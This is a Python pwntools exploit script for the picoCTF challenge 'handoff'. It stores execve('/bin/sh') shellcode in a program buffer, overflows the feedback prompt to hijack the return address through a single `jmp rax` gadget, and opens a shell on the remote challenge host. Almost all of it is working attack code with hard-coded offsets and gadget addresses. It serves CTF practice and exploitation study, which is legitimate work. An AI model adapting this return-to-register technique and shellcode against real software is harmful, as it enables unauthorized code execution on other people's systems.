Stack buffer overflow exploited with a single `jmp rax` gadget (return-to-register) that pivots into stack-resident shellcode — a minimal return-address hijack rather than a full ROP gadget chain. Uses checksec, ROPgadget, Ghidra, GDB.
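"""Exploit for the picoCTF pwn challenge "handoff" (remote instance by default).

Technique: the exit "feedback" prompt overflows a stack buffer and lets us
overwrite the saved return address.  Instead of a full ROP chain we return
into a single `jmp rax` gadget, which lands on a tiny trampoline placed at
the start of the overflowed buffer; the trampoline rewinds rax onto shellcode
we stored earlier as a recipient's message.

Steps:
  1. Add 10 recipients so that slot 9 exists.
  2. Store amd64 execve("/bin/sh") shellcode as the message for slot 9.
  3. Choose "exit" and answer the feedback prompt with
       [sub rax, 68; jmp rax][nop padding to 20 bytes][address of `jmp rax`]
  4. On `ret` the gadget jumps to rax — assumed to point at the feedback
     buffer — which runs the trampoline and drops into the shellcode.

Preconditions (implied by the technique, presumably confirmed with checksec):
no PIE (the gadget address is hard-coded) and an executable stack (the
shellcode runs from the program's own buffers).  The 20-byte padding, the
68-byte rewind and the gadget address were recovered from this exact binary
with Ghidra/GDB/ROPgadget and must be re-derived if it is rebuilt.
"""
from pwn import *

context.arch = 'amd64'
context.terminal = ['tmux', 'splitw', '-h']  # only used by gdb.attach() when debugging locally

# Remote instance; picoCTF assigns a new host/port each time the challenge is launched.
HOST, PORT = 'shape-facility.picoctf.net', 64717
LOCAL_BINARY = './handoff'

N_RECIPIENTS = 10      # slots 0..9 — the shellcode is stored in the last one
SHELLCODE_SLOT = 9
FEEDBACK_PAD = 20      # bytes from the start of the feedback buffer to the saved return address (from GDB)
REWIND = 68            # bytes from the feedback buffer back to the stored message (from GDB)
JMP_RAX = 0x40116c     # `jmp rax` gadget in the non-PIE binary (from ROPgadget)


def connect(local=False):
    """Open the target: the remote instance by default, the local binary when *local* is set."""
    if local:
        p = process(LOCAL_BINARY)
        # pause()  # uncomment to attach GDB to the local process before the exploit runs
        return p
    return remote(HOST, PORT)


def expect(p, marker):
    """Read up to and including *marker*, echoing the transcript so a stall is easy to spot."""
    data = p.recvuntil(marker)
    print(data)
    return data


def add_recipient(p, name):
    """Menu option 1: create a recipient called *name* (bytes)."""
    expect(p, b'Exit the app')
    p.sendline(b'1')
    expect(p, b'name:')
    p.sendline(name)


def send_message(p, slot, body):
    """Menu option 2: store *body* (bytes) as the message for recipient *slot*."""
    expect(p, b'Exit the app')
    p.sendline(b'2')
    expect(p, b'message to?')
    p.sendline(str(slot).encode())
    expect(p, b'send them?')
    p.sendline(body)


def build_shellcode():
    """Return amd64 execve("/bin/sh") shellcode that survives the line-based transport."""
    sc = asm(shellcraft.sh())
    # sendline() terminates the payload with '\n'; a 0x0a byte inside the
    # shellcode would truncate it if the target reads line-oriented input.
    if b'\n' in sc:
        raise ValueError("shellcode contains a newline byte; it would be truncated by a line read")
    log.info(f"shellcode is {len(sc)} bytes")
    return sc


def build_feedback():
    """Return the overflowing feedback answer: trampoline, nop padding, return address."""
    # Trampoline: rax is assumed to hold this buffer's address at `ret`, so
    # rewinding it by REWIND bytes lands on the shellcode stored in slot 9.
    trampoline = asm(f'sub rax, {REWIND}; jmp rax').ljust(FEEDBACK_PAD, b'\x90')
    if len(trampoline) != FEEDBACK_PAD:
        raise ValueError("trampoline is longer than the padding; the return address would be misaligned")
    return trampoline + p64(JMP_RAX)


def main():
    """Run the full exploit against the target and hand the shell to the user."""
    p = connect(local=False)

    # 1. Fill the recipient table so that slot SHELLCODE_SLOT exists.
    for _ in range(N_RECIPIENTS):
        add_recipient(p, b'thedoctor')

    # 2. Park the shellcode in that recipient's message.
    send_message(p, SHELLCODE_SLOT, build_shellcode())

    # 3. Exit; the feedback prompt is the overflowing read.
    expect(p, b'Exit the app')
    p.sendline(b'3')
    expect(p, b'really appreciate it')
    # Trampoline and return address go out in one write so a single read()
    # on the target sees the whole overflow; the trailing '\n' preserves the
    # sendline() terminator the target may be waiting for.
    p.send(build_feedback() + b'\n')

    # 4. Shell.
    p.interactive()


if __name__ == '__main__':
    main()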